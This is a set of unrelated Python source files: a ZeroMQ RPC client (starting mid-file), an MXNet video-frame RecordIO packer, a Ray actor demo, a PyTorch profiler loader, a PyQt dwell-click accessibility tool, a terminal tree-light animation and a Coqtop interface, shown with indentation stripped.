if msg[0] == "replay":
return msg[2]
elif msg[0] == "exception":
raise RemoteException("{0}".format(msg[2]))
else:
raise UnknownMessageType("unknow message type")
else:
#if timeout we have to close the old one and create a new one
#TODO:(cd)according to the zmq's doc, it's a bad behaviour to create and close lots of sockets
self.__on_timeout()
raise Timeout("timeout")
def __close(self):
self.__poller.unregister(self.__socket)
self.__socket.setsockopt(zmq.LINGER, 0)
self.__socket.close()
self.__context.term()
def __getattr__(self, name):
return Call(name, self)
class AsyncClient(object):
def __init__(self, address, timeout=60, threaded=True):
self.__exit_flag = threading.Event()
self.__address = tuple(address)
self._timeout = timeout
self.__uid = uuid.uuid1().hex
self.__context = zmq.Context(1)
self.__io_thread = threading.Thread(target=self.__io)
self.__io_thread.daemon = True
self.__io_thread.start()
self.__replays = {}
self.__threaded = threaded
if threaded:
self.__tlocal = threading.local()
else:
class _(object):
pass
self.__tlocal = _()
@property
def __push_socket(self):
if hasattr(self.__tlocal, "socket"):
return self.__tlocal.socket
else:
self.__tlocal.socket = self.__context.socket(zmq.PUSH)
self.__tlocal.socket.connect("inproc://zmqdrpc-%s"%self.__uid)
return self.__tlocal.socket
@__push_socket.setter
def __push_socket(self, value):
self.__tlocal.socket = value
def _on_call(self, name, timeout, args, kwargs):
#TODO:(cd)make request id short
request_id = uuid.uuid1().hex
msg = msgpack.packb(["request", request_id, name, args, kwargs], encoding="utf-8")
replay = Replay(request_id, time.time() + timeout)
self.__replays[request_id] = replay
self.__push_socket.send_multipart([msg])
return replay
def __io(self):
self.__pull_socket = self.__context.socket(zmq.PULL)
self.__pull_socket.bind("inproc://zmqdrpc-%s"%self.__uid)
self.__socket = self.__context.socket(zmq.DEALER)
self.__socket.connect("tcp://%s:%s"%self.__address)
self.__poller = zmq.Poller()
self.__poller.register(self.__pull_socket, zmq.POLLIN)
self.__poller.register(self.__socket, zmq.POLLIN)
try:
while 1:
socks = dict(self.__poller.poll(1000))
if socks.get(self.__pull_socket) == zmq.POLLIN:
frames = self.__pull_socket.recv_multipart()
#add an empty frame to behave like REQ
self.__socket.send_multipart([b''] + frames)
if socks.get(self.__socket) == zmq.POLLIN:
#skip the empty frame
frames = self.__socket.recv_multipart()[1:]
if len(frames) == 1:
msg = msgpack.unpackb(frames[0], encoding="utf-8")
else:
LOGGER.warn("recv unknown format message")
continue
if msg[0] == "replay":
rep = msg[2]
is_error = False
elif msg[0] == "exception":
rep = RemoteException("{0}".format(msg[2]))
is_error = True
else:
LOGGER.warn("unknow message type: %s", msg[0])
continue
request_id = msg[1]
if request_id in self.__replays:
self.__replays[request_id]._Replay__set(rep, is_error)
self.__replays.pop(request_id)
now = time.time()
self.__replays = dict((item for item in self.__replays.items() if now < item[1].timeout_at))
if self.__exit_flag.isSet():
break
finally:
self.__pull_socket.setsockopt(zmq.LINGER, 0)
self.__socket.setsockopt(zmq.LINGER, 0)
self.__pull_socket.close()
self.__socket.close()
self.__context.term()
def __getattr__(self, name):
return Call(name, self)
|
video2rec.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
curr_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(curr_path, "../python"))
import mxnet as mx
import random
import argparse
import cv2
import time
import traceback
import pdb
try:
import multiprocessing
except ImportError:
multiprocessing = None
def read_video_txt(path_in,frame_per_video):
"""
read txtfile
Parameters:
---------
name : str
txtfile path
frame_per_video:int
frame per video
Returns:
---------
[index,image_path,label] as iterator
"""
num_index=0
with open(path_in) as fin:
while True:
line = fin.readline()
#print line
if not line:
break
line = [i.strip() for i in line.strip().split(' ')]
line_len = len(line)
if line_len < 3:
print('lst should at least has three parts, but only has %s parts for %s' %(line_len, line))
continue
try:
label = float(line[-1])
length = int(line[1])
new_length = 1
average_duration = length/frame_per_video
for i in range(0,frame_per_video):
if average_duration >= new_length:
if (i+1)*average_duration <= length:
offset = int(random.uniform(i* average_duration,(i+1)*average_duration))
else:
offset = int(random.uniform(i* average_duration,length))
if offset <= 0:
offset = 1
elif offset >= length:
offset = length
image_path = line[0] + "/img_%05d.jpg"%(offset)
index = int(num_index + i)
item = [index] + [image_path] + [label]
yield item
num_index += frame_per_video
except Exception as e:
print('Parsing lst met error for %s, detail: %s' %(line, e))
continue
def image_encode(args, i, item, q_out):
"""
loading and processing image
Parameters:
---------
args:
image augment argument
i: int
the index of image in iterator
item : list
index,image_path and label of image in datasets
q_out : queue
saving resluts in the form of (i,pack_img,item)
"""
# fullpath = os.path.join(args.root, item[1])
fullpath = item[1]
if len(item) > 3 and args.pack_label:
header = mx.recordio.IRHeader(0, item[2:], item[0], 0)
else:
header = mx.recordio.IRHeader(0, item[2], item[0], 0)
if args.pass_through:
try:
with open(fullpath, 'rb') as fin:
img = fin.read()
s = mx.recordio.pack(header, img)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error:', item[1], e)
q_out.put((i, None, item))
return
try:
img = cv2.imread(fullpath, args.color)
except:
traceback.print_exc()
print('imread error trying to load file: %s ' % fullpath)
q_out.put((i, None, item))
return
if img is None:
print('imread read blank (None) image for file: %s' % fullpath)
q_out.put((i, None, item))
return
if args.center_crop:
if img.shape[0] > img.shape[1]:
margin = (img.shape[0] - img.shape[1]) // 2;
img = img[margin:margin + img.shape[1], :]
else:
margin = (img.shape[1] - img.shape[0]) // 2;
img = img[:, margin:margin + img.shape[0]]
if args.resize:
if img.shape[0] > img.shape[1]:
newsize = (args.resize, img.shape[0] * args.resize // img.shape[1])
else:
newsize = (img.shape[1] * args.resize // img.shape[0], args.resize)
img = cv2.resize(img, newsize)
try:
s = mx.recordio.pack_img(header, img, quality=args.quality, img_fmt=args.encoding)
q_out.put((i, s, item))
except Exception as e:
traceback.print_exc()
print('pack_img error on file: %s' % fullpath, e)
q_out.put((i, None, item))
return
def read_worker(args, q_in, q_out):
"""
loading and processing image by multiprocessing
Parameters:
---------
args:
image augment argument
q_in:multiprocessing.Queue()
the index of image in iterator, index image_path and label ofimage in datasets
q_out:multiprocessing.Queue()
saving resluts in the form of (i,pack_img,item)
"""
while True:
deq = q_in.get()
if deq is None:
break
i, item = deq
image_encode(args, i, item, q_out)
def write_worker(q_out, fname, working_dir):
"""
saving image in the form of rec by by multiprocessing
Parameters:
---------
q_out: multiprocessing.Queue
contain processed image in the form of (i,pack_img,item)
fname:str
txtfile path
working_dir:str
path to folder containing txtfile
"""
pre_time = time.time()
count = 0
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
buf = {}
more = True
while more:
deq = q_out.get()
if deq is not None:
i, s, item = deq
buf[i] = (s, item)
else:
more = False
while count in buf:
s, item = buf[count]
del buf[count]
if s is not None:
record.write_idx(item[0], s)
if count % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', count)
pre_time = cur_time
count += 1
def parse_args():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='Create an image list or \
make a record database by reading from an image list')
parser.add_argument('prefix', help='prefix of input/output txt and rec files.')
parser.add_argument('--frame-per-video', type=int, default=3,help='frame per video')
rgroup = parser.add_argument_group('Options for creating database')
rgroup.add_argument('--pass-through', action='store_true',
help='whether to skip transformation and save image as is')
rgroup.add_argument('--resize', type=int, default=0,
help='resize the shorter edge of image to the newsize, original images will\
be packed by default.')
rgroup.add_argument('--center-crop', action='store_true',
help='specify whether to crop the center image to make it rectangular.')
rgroup.add_argument('--quality', type=int, default=95,
help='JPEG quality for encoding, 1-100; or PNG compression for encoding, 1-9')
rgroup.add_argument('--num-thread', type=int, default=1,
help='number of thread to use for encoding. order of images will be different\
from the input list if >1. the input list will be modified to match the\
resulting order.')
rgroup.add_argument('--color', type=int, default=1, choices=[-1, 0, 1],
help='specify the color mode of the loaded image.\
1: Loads a color image. Any transparency of image will be neglected. It is the default flag.\
0: Loads image in grayscale mode.\
-1:Loads image as such including alpha channel.')
rgroup.add_argument('--encoding', type=str, default='.jpg', choices=['.jpg', '.png'],
help='specify the encoding of the images.')
rgroup.add_argument('--pack-label', action='store_true',
help='Whether to also pack multi dimensional label in the record file')
args = parser.parse_args()
args.prefix = os.path.abspath(args.prefix)
return args
if __name__ == '__main__':
args = parse_args()
if os.path.isdir(args.prefix):
working_dir = args.prefix
else:
working_dir = os.path.dirname(args.prefix)
files = [os.path.join(working_dir, fname) for fname in os.listdir(working_dir)
if os.path.isfile(os.path.join(working_dir, fname))]
count = 0
for fname in files:
if fname.startswith(args.prefix) and fname.endswith('.txt'):
print('Creating .rec file from', fname, 'in', working_dir)
count += 1
image_list = read_video_txt(fname,args.frame_per_video)
# -- write_record -- #
if args.num_thread > 1 and multiprocessing is not None:
q_in = [multiprocessing.Queue(1024) for i in range(args.num_thread)]
q_out = multiprocessing.Queue(1024)
read_process = [multiprocessing.Process(target=read_worker, args=(args, q_in[i], q_out)) \
for i in range(args.num_thread)]
for p in read_process:
p.start()
write_process = multiprocessing.Process(target=write_worker, args=(q_out, fname, working_dir))
write_process.start()
for i, item in enumerate(image_list):
q_in[i % len(q_in)].put((i, item))
for q in q_in:
q.put(None)
for p in read_process:
p.join()
q_out.put(None)
write_process.join()
else:
print('multiprocessing not available, fall back to single threaded encoding')
try:
import Queue as queue
except ImportError:
import queue
q_out = queue.Queue()
fname = os.path.basename(fname)
fname_rec = os.path.splitext(fname)[0] + '.rec'
fname_idx = os.path.splitext(fname)[0] + '.idx'
record = mx.recordio.MXIndexedRecordIO(os.path.join(working_dir, fname_idx),
os.path.join(working_dir, fname_rec), 'w')
cnt = 0
pre_time = time.time()
for i, item in enumerate(image_list):
print (i ,item)
image_encode(args, i, item, q_out)
if q_out.empty():
continue
_, s, _ = q_out.get()
record.write_idx(item[0], s)
if cnt % 1000 == 0:
cur_time = time.time()
print('time:', cur_time - pre_time, ' count:', cnt)
pre_time = cur_time
cnt += 1
if not count:
print('Did not find and list file with prefix %s'%args.prefix)
|
simpleeca.py
|
import asyncio
import random
import ray
import threading
import time
async def some_event_step(stepid):
await asyncio.sleep(random.uniform(2, 4))
return stepid
@ray.remote
class SimpleECA:
def __init__(self):
self.pool = []
try:
self.thread = threading.Thread(target=asyncio.run, args=(self.listener_loop(),))
self.thread.daemon = True
self.thread.start()
print('thread started')
except BaseException as err:
print(err)
print ("Error: unable to start thread")
async def register_event(self, stepid):
self.pool.append(stepid)
return 'registered'
async def listener_loop(self):
while True:
await asyncio.sleep(3)
print(f"pool {self.pool}")
if len(self.pool) > 0:
listeners = set()
for e in self.pool:
listeners.add(some_event_step(e))
finished, unfinished = await asyncio.wait(listeners, timeout=5,
return_when=asyncio.FIRST_COMPLETED)
for item in finished:
print(f"event {item.result()} arrived")
self.pool.remove(item.result())
async def check_status(self):
return self.pool.values()
ray.init(address='auto')
async def __main__(*args, **kwargs):
eca = SimpleECA.remote()
obj1 = await eca.register_event.remote('step_0001')
print('step_0001 registered')
await asyncio.sleep(2)
obj2 = await eca.register_event.remote('step_0002')
print('step_0002 registered')
await asyncio.sleep(20)
asyncio.run(__main__())
|
loader.py
|
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# --------------------------------------------------------------------------
import bisect
import os
import sys
from collections import defaultdict
from .. import consts, io, utils
from ..run import Run
from .multiprocessing import Process, Queue
from .data import DistributedRunProfileData, RunProfileData
from .run_generator import DistributedRunGenerator, RunGenerator
logger = utils.get_logger()
class RunLoader(object):
def __init__(self, name, run_dir, caches):
self.run_name = name
self.run_dir = run_dir
self.caches = caches
self.queue = Queue()
def load(self):
workers = []
spans_by_workers = defaultdict(list)
for path in io.listdir(self.run_dir):
if io.isdir(io.join(self.run_dir, path)):
continue
match = consts.WORKER_PATTERN.match(path)
if not match:
continue
worker = match.group(1)
span = match.group(2)
if span is not None:
# remove the starting dot (.)
span = span[1:]
bisect.insort(spans_by_workers[worker], span)
workers.append((worker, span, path))
span_index_map = {}
for worker, span_array in spans_by_workers.items():
for i, span in enumerate(span_array, 1):
span_index_map[(worker, span)] = i
for worker, span, path in workers:
# convert the span timestamp to the index.
span_index = None if span is None else span_index_map[(worker, span)]
p = Process(target=self._process_data, args=(worker, span_index, path))
p.start()
logger.info("started all processing")
distributed_run = Run(self.run_name, self.run_dir)
run = Run(self.run_name, self.run_dir)
num_items = len(workers)
while num_items > 0:
item = self.queue.get()
num_items -= 1
r, d = item
if r or d:
logger.debug("Loaded profile via mp.Queue")
if r is not None:
run.add_profile(r)
if d is not None:
distributed_run.add_profile(d)
distributed_profiles = self._process_spans(distributed_run)
for d in distributed_profiles:
if d is not None:
run.add_profile(d)
# for no daemon process, no need to join them since it will automatically join
return run
def _process_data(self, worker, span, path):
import absl.logging
absl.logging.use_absl_handler()
try:
logger.debug("Parse trace, run_dir=%s, worker=%s", self.run_dir, path)
local_file = self.caches.get_remote_cache(io.join(self.run_dir, path))
data, trace_path = RunProfileData.parse(worker, span, local_file)
if trace_path != local_file:
self.caches.add_file(local_file, trace_path)
generator = RunGenerator(worker, span, data)
profile = generator.generate_run_profile()
dist_data = DistributedRunProfileData(data)
logger.debug("Sending back profile via mp.Queue")
self.queue.put((profile, dist_data))
except KeyboardInterrupt:
logger.warning("tb_plugin receive keyboard interrupt signal, process %d will exit" % (os.getpid()))
sys.exit(1)
except Exception as ex:
logger.warning("Failed to parse profile data for Run %s on %s. Exception=%s",
self.run_name, worker, ex, exc_info=True)
self.queue.put((None, None))
logger.debug("finishing process data")
def _process_spans(self, distributed_run):
spans = distributed_run.get_spans()
if spans is None:
return [self._process_distributed_profiles(distributed_run.get_profiles(), None)]
else:
span_profiles = []
for span in spans:
profiles = distributed_run.get_profiles(span=span)
p = self._process_distributed_profiles(profiles, span)
if p is not None:
span_profiles.append(p)
return span_profiles
def _process_distributed_profiles(self, profiles, span):
has_communication = True
comm_node_lists = []
for data in profiles:
logger.debug("Processing profile data")
# Set has_communication to False and disable distributed view if any one worker has no communication
if data.has_communication and data.comm_node_list:
comm_node_lists.append(data.comm_node_list)
if len(comm_node_lists[-1]) != len(comm_node_lists[0]):
logger.error("Number of communication operation nodes don't match between workers in run: %s" % self.run_name)
has_communication = False
else:
has_communication = False
logger.debug("Processing profile data finish")
if not has_communication:
logger.debug("There is no communication profile in this run.")
return None
worker_num = len(comm_node_lists)
for i, node in enumerate(comm_node_lists[0]):
kernel_range_size = len(node.kernel_ranges)
# loop for all communication kernel ranges in order
for j in range(kernel_range_size):
min_range = sys.maxsize
# For each kernel_range, find the minist between workers as the real communication time
for k in range(worker_num):
kernel_ranges = comm_node_lists[k][i].kernel_ranges
if len(kernel_ranges) != kernel_range_size:
logger.error("Number of communication kernels don't match between workers in run: %s" % self.run_name)
has_communication = False
return None
if kernel_ranges:
if kernel_ranges[j][1] - kernel_ranges[j][0] < min_range:
min_range = kernel_ranges[j][1] - kernel_ranges[j][0]
for k in range(worker_num):
kernel_range = comm_node_lists[k][i].kernel_ranges[j]
comm_node_lists[k][i].real_time_ranges.append((kernel_range[1] - min_range, kernel_range[1]))
for data in profiles:
data.communication_parse()
generator = DistributedRunGenerator(profiles, span)
profile = generator.generate_run_profile()
return profile
|
test3.py
|
import sys
from PyQt5 import QtGui,QtWidgets,QtCore
from PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QSizePolicy, QApplication, QDesktopWidget
import threading
from pynput.mouse import Button,Controller
from pynput.keyboard import Controller as KController
from pynput.keyboard import Key
import time
import struct
import pyaudio
import pvporcupine
mouse = Controller() #for controlling mouse cursor
keyboard=KController()
w=0
h=0
flag = True #to execute threads one at a time
#This class represents the secondary status window
class Window(QWidget):
def __init__(self, tt):
super().__init__()
self.setWindowTitle("Mode Window")
self.setWindowIcon(QtGui.QIcon("Python-symbol.jpg"))
label = QtWidgets.QLabel(self) #label represents window's text
label.setText(tt)
label.setFont(QtGui.QFont('Arial', 20))
label.adjustSize() #window size depends on text length
label.setSizePolicy(QtWidgets.QSizePolicy.Ignored, QtWidgets.QSizePolicy.Ignored)
self.setAttribute(QtCore.Qt.WA_TransparentForMouseEvents) #disables mouse events on window
self.setStyleSheet("color:black; background-color: white;")
self.setWindowOpacity(0.60)
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.setWindowFlags(flags)
self.show()
#To position the window above taskbar on the bottom right corner
ab = QDesktopWidget().screenGeometry()
width = self.frameGeometry().width()
height = self.frameGeometry().height()
global w
global h
w=int(width)
h=int(height)
dw = app.desktop()
t_h = dw.screenGeometry().height() - dw.availableGeometry().height()
self.move(ab.width()-width, dw.screenGeometry().height()-t_h-height)
#This class represents the primary GUI window
class GridDemo(QWidget):
def __init__(self):
super().__init__()
self.win = Window('Left-Click Mode') #instantiating the status window class
self.center()
flags = QtCore.Qt.WindowFlags(QtCore.Qt.FramelessWindowHint | QtCore.Qt.WindowStaysOnTopHint)
self.setWindowFlags(flags)
self.setWindowTitle("GUI Window")
self.setWindowIcon(QtGui.QIcon("Python-symbol.jpg"))
self.setStyleSheet("background-color: black")
values = ['Left-Click', 'No-Click', 'Hover', 'Double-Click', '', 'Right-Click', 'Scroll', 'On-Screen Keyboard', 'Drag'] #represents each button on GUI
positions = [(r, c) for r in range(4) for c in range(3)]
layout = QGridLayout()
self.setLayout(layout)
for positions, value in zip(positions, values): #for each button in the grid,
self.button = QPushButton(value)
self.button.setStyleSheet("QPushButton{color:black; background-color : white; font-size: 17px; }QPushButton::pressed{background-color : #C0C0C0;}")
self.button.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
layout.addWidget(self.button, *positions)
self.button.clicked.connect(self.btnClicked) #if clicked, call btnClicked()
#This function is used to bind actions to buttons on the grid when clicked
def btnClicked(self):
global flag
sender = self.sender()
if sender.text() == "Left-Click": #to identify the clicked button
self.close() #closes primary window
self.win = Window('Left-Click Mode')
flag = False #stop execution of current thread
time.sleep(0.3)
flag = True
left = threading.Thread(target=left_click, daemon=True) #create a new thread for executing left_click()
left.start()
elif sender.text() == "No-Click":
self.close()
self.win = Window('No-Click Mode')
flag = False
time.sleep(0.3)
flag = True
nc = threading.Thread(target=no_click, daemon=True)
nc.start()
elif sender.text() == "On-Screen Keyboard":
self.close()
with keyboard.pressed(Key.cmd): #to close the keyboard, if user clicks cmd+ctrl+o
with keyboard.pressed(Key.ctrl):
keyboard.press('o')
keyboard.release('o')
elif sender.text() == "Hover":
self.close()
self.win = Window('Hover Mode')
flag = False
time.sleep(0.3)
flag = True
hr = threading.Thread(target=hover, daemon=True)
hr.start()
elif sender.text() == "Double-Click":
self.close()
self.win = Window('Double-Click Mode')
flag = False
time.sleep(0.3)
flag = True
dc = threading.Thread(target=double_click, daemon=True)
dc.start()
elif sender.text() == "Right-Click":
self.close()
self.win = Window('Right-Click Mode')
flag = False
time.sleep(0.3)
flag = True
right = threading.Thread(target=right_click, daemon=True)
right.start()
elif sender.text() == "Scroll":
self.close()
self.win = Window('Scroll Mode')
flag = False
time.sleep(0.3)
flag = True
sc = threading.Thread(target=scroll, daemon=True)
sc.start()
elif sender.text() == "Drag":
self.close()
self.win = Window('Drag Mode')
flag = False
time.sleep(0.3)
flag = True
dr = threading.Thread(target=drag, daemon=True)
dr.start()
#This function is used to center the primary gui window
def center(self):
ab = QDesktopWidget().screenGeometry()
w = ab.width()*0.3
h = ab.height()*0.3
self.resize(w,h)
x = 0.5*w
y = 0.5*h
self.move((ab.width()/2)-x,(ab.height()/2)-y)
#This function performs no actions and runs till flag becomes false
def no_click():
while True:
global flag
if(flag==False): #to stop execution when another mouse mode is selected
print("Exited no click")
break
time.sleep(0.25)
#This function performs a left click action
def left_click():
print("left click")
prevx = -1 #to detect cursor's deviations
prevy = -1
count=0
while True:
global flag
if(flag==False):
print("Exited left click")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5): #if there is a considerable cursor movement
count=count+1
if(count>=3):
mouse.click(Button.left)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function performs a right click action
def right_click():
print("right click")
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited right click")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
mouse.click(Button.right)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function performs two consecutive left clicks
def double_click():
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited double click")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
mouse.click(Button.left,2)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function performs a left click with extended delay to hover
def hover():
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited hover mode")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=8):
mouse.click(Button.left)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function alternates between mouse press & release to perform a mouse drag
def drag():
prevx = -1
prevy = -1
count=0
drag_on=0 #to alternate between mouse's press and release
while True:
global flag
if (flag==False):
print("Exited drag mode")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
if(drag_on==0):
mouse.press(Button.left)
else:
mouse.release(Button.left)
drag_on=1-drag_on
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function uses the mouse middle button to perform scrolling
def scroll():
prevx = -1
prevy = -1
count=0
while True:
global flag
if (flag==False):
print("Exited scroll mode")
break
#print("Entered loop")
x,y=mouse.position
#print("("+str(x)+","+str(y)+")")
if (x<=prevx+5 and x>=prevx-5 and y<=prevy+5 and y>=prevy-5):
count=count+1
if(count>=3):
mouse.click(Button.middle)
print("Mouse clicked")
count=0
else:
count=0
prevx=x
prevy=y
time.sleep(0.25)
#This function centers the mouse cursor and selects left click mode each time the gui pops up
def winCheck():
global w
global h
while True:
check = demo.isActiveWindow()
#print("Active window : " + str(check))
if (check): #if window is actively in foreground
print(threading.active_count())
xy = QDesktopWidget().screenGeometry()
x=int(xy.width())
y=int(xy.height())
mouse.position = (int(x/2),int(y/2)) #centers the mouse cursor
global flag
flag = False
time.sleep(0.3)
flag = True
left = threading.Thread(target=left_click,daemon=True) #creates a thread for left click operation
left.start()
while (demo.isActiveWindow()):
time.sleep(1)
def wake(demo):
porcupine = None
pa = None
audio_stream = None
try:
porcupine = pvporcupine.create(keywords=["computer"])
pa = pyaudio.PyAudio()
audio_stream = pa.open(
rate=porcupine.sample_rate,
channels=1,
format=pyaudio.paInt16,
input=True,
frames_per_buffer=porcupine.frame_length)
while True:
pcm = audio_stream.read(porcupine.frame_length)
pcm = struct.unpack_from("h" * porcupine.frame_length, pcm)
keyword_index = porcupine.process(pcm)
if keyword_index >= 0:
print("Hotword Detected")
demo.show()
demo.activateWindow()
finally:
if porcupine is not None:
porcupine.delete()
if audio_stream is not None:
audio_stream.close()
if pa is not None:
pa.terminate()
if __name__ == "__main__":
left = threading.Thread(target=left_click, daemon=True) #creates a thread for left click operation initially
left.start()
app = QApplication(sys.argv)
demo = GridDemo() #instantiates the primary gui window
demo.show()
wc = threading.Thread(target=winCheck,daemon=True)
wc.start()
wk = threading.Thread(target=wake,daemon=True,args=(demo,))
wk.start()
sys.exit(app.exec_())
|
treeRender.py
|
import threading
import random
import os
import time
mutex = threading.Lock()
tree = list(open('treeTemplate.txt').read().rstrip())
def formatColor(color):
if color == 'Y':
return f'\033[93m⏺\033[0m'
if color == 'R':
return f'\033[91m⏺\033[0m'
if color == 'G':
return f'\033[92m⏺\033[0m'
if color == 'B':
return f'\033[94m⏺\033[0m'
def lights(color):
indexes = lightList[color]
lightOff = True
while True:
for index in indexes:
tree[index] = formatColor(color) if lightOff else '⏺'
# Critical section
mutex.acquire()
os.system('cls' if os.name == 'nt' else 'clear') # Clears screen
print(''.join(tree))
mutex.release()
lightOff = not lightOff
time.sleep(random.uniform(0.5, 1.5)) # Randomness of light blink
lightList = { # Dictionary of indices of lights on tree
"Y": [],
"R": [],
"G": [],
"B": []
}
threadList = { # Dictionary of various color threads
"Y": threading.Thread(target=lights, args=("Y")),
"R": threading.Thread(target=lights, args=("R")),
"G": threading.Thread(target=lights, args=("G")),
"B": threading.Thread(target=lights, args=("B"))
}
for index, char in enumerate(tree):
if char in "YRGB":
lightList[char].append(index)
tree[index] = '⏺'
for thread in threadList.values():
thread.start()
for thread in threadList.values():
thread.join()
|
coqtop.py
|
# -*- coding: utf8 -*-
# Author: Wolf Honore
"""Coqtop interface with functions to send commands and parse responses."""
import datetime
import logging
import signal
import subprocess
import threading
import time
from concurrent import futures
from queue import Empty, Queue
from tempfile import NamedTemporaryFile
from typing import (
IO,
TYPE_CHECKING,
Any,
Iterable,
Iterator,
List,
Mapping,
Optional,
Tuple,
Union,
)
from xmlInterface import (
TIMEOUT_ERR,
UNEXPECTED_ERR,
Err,
FindCoqtopError,
Goals,
Ok,
Result,
XMLInterface,
XMLInterfaceBase,
partition_warnings,
prettyxml,
)
if TYPE_CHECKING:
# pylint: disable=unsubscriptable-object
from typing_extensions import TypedDict
BytesQueue = Queue[bytes]
CoqtopProcess = subprocess.Popen[bytes]
VersionInfo = TypedDict(
"VersionInfo",
{
"version": Tuple[int, int, int],
"str_version": str,
"latest": Optional[str],
},
)
else:
BytesQueue = Queue
CoqtopProcess = subprocess.Popen
VersionInfo = Mapping[str, Any]
class CoqtopError(Exception):
"""An exception for when Coqtop stops unexpectedly."""
class Coqtop:
"""Provide an interface to the background Coqtop process."""
def __init__(self) -> None:
"""Initialize Coqtop state.
coqtop - The Coqtop process
states - A stack of previous state_ids (grows to the right)
state_id - The current state_id
root_state - The starting state_id
out_q - A thread-safe queue of data read from Coqtop
err_q - A thread-safe queue of error messages read from Coqtop
xml - The XML interface for the given version
"""
self.coqtop: Optional[CoqtopProcess] = None
self.xml: Optional[XMLInterfaceBase] = None
self.states: List[int] = []
self.state_id = -1
self.root_state = -1
self.out_q: BytesQueue = Queue()
self.err_q: BytesQueue = Queue()
self.stopping = False
# Debugging
self.log: Optional[IO[str]] = None
self.handler: logging.Handler = logging.NullHandler()
self.logger = logging.getLogger(str(id(self)))
self.logger.addHandler(self.handler)
self.logger.setLevel(logging.INFO)
# Coqtop Interface #
def start(
self,
coq_path: Optional[str],
coq_prog: Optional[str],
filename: str,
args: Iterable[str],
timeout: Optional[int] = None,
) -> Tuple[Union[VersionInfo, str], str]:
"""Launch the Coqtop process."""
assert self.coqtop is None
try:
self.logger.debug("start")
self.xml, latest = XMLInterface(coq_path, coq_prog)
launch = self.xml.launch(filename, args)
self.logger.debug(launch)
self.coqtop = subprocess.Popen( # pylint: disable=consider-using-with
launch,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
bufsize=0,
)
# Ensure that Coqtop spawned correctly
try:
self.coqtop.wait(timeout=0.1)
assert self.coqtop.stderr is not None
return self.coqtop.stderr.read().decode("utf8"), ""
except subprocess.TimeoutExpired:
pass
# Spawn threads to monitor Coqtop's stdout and stderr
for buf, stream in (
(self.out_q, self.coqtop.stdout),
(self.err_q, self.coqtop.stderr),
):
threading.Thread(
target=self.capture_out,
args=(buf, stream),
daemon=True,
).start()
threading.Thread(target=self.capture_dead, daemon=True).start()
# Initialize Coqtop
response, err = self.call(self.xml.init(), timeout=timeout)
if isinstance(response, Err):
return response.msg, err
self.root_state = response.val
self.state_id = response.val
return (
{
"version": self.xml.version,
"str_version": self.xml.str_version,
"latest": latest,
},
err,
)
except (OSError, FindCoqtopError) as e:
# Failed to launch or find Coqtop
self.coqtop = None
return str(e), ""
def stop(self) -> None:
"""End the Coqtop process."""
if self.coqtop is not None:
self.logger.debug("stop")
self.stopping = True
try:
# Try to terminate Coqtop cleanly
# TODO: use Quit call
self.coqtop.terminate()
self.coqtop.communicate()
except (OSError, ValueError, AttributeError):
try:
# Force Coqtop to stop
self.coqtop.kill()
except (OSError, AttributeError):
pass
self.coqtop = None
# Close debugging log
try:
self.handler.flush()
self.handler.close()
except ValueError:
pass
if self.log is not None and not self.log.closed:
self.log.close()
def advance(
self,
cmd: str,
encoding: str = "utf-8",
timeout: Optional[int] = None,
) -> Tuple[bool, str, Optional[Tuple[int, int]], str]:
"""Advance Coqtop by sending 'cmd'."""
assert self.xml is not None
self.logger.debug("advance: %s", cmd)
response, err1 = self.call(
self.xml.add(cmd, self.state_id, encoding=encoding),
timeout=timeout,
)
if isinstance(response, Err):
return False, response.msg, response.loc, err1
# In addition to sending 'cmd', also check status in order to force it
# to be evaluated
status, err2 = self.call(self.xml.status(encoding=encoding), timeout=timeout)
# Combine messages
msgs = "\n\n".join(
msg
for msg in (response.msg, response.val["res_msg"], status.msg)
if msg != ""
)
err = err1 + err2
if isinstance(status, Err):
# Reset state id to before the error
self.call(self.xml.edit_at(self.state_id, 1))
return False, msgs, status.loc, err
self.states.append(self.state_id)
self.state_id = response.val["state_id"]
return True, msgs, None, err
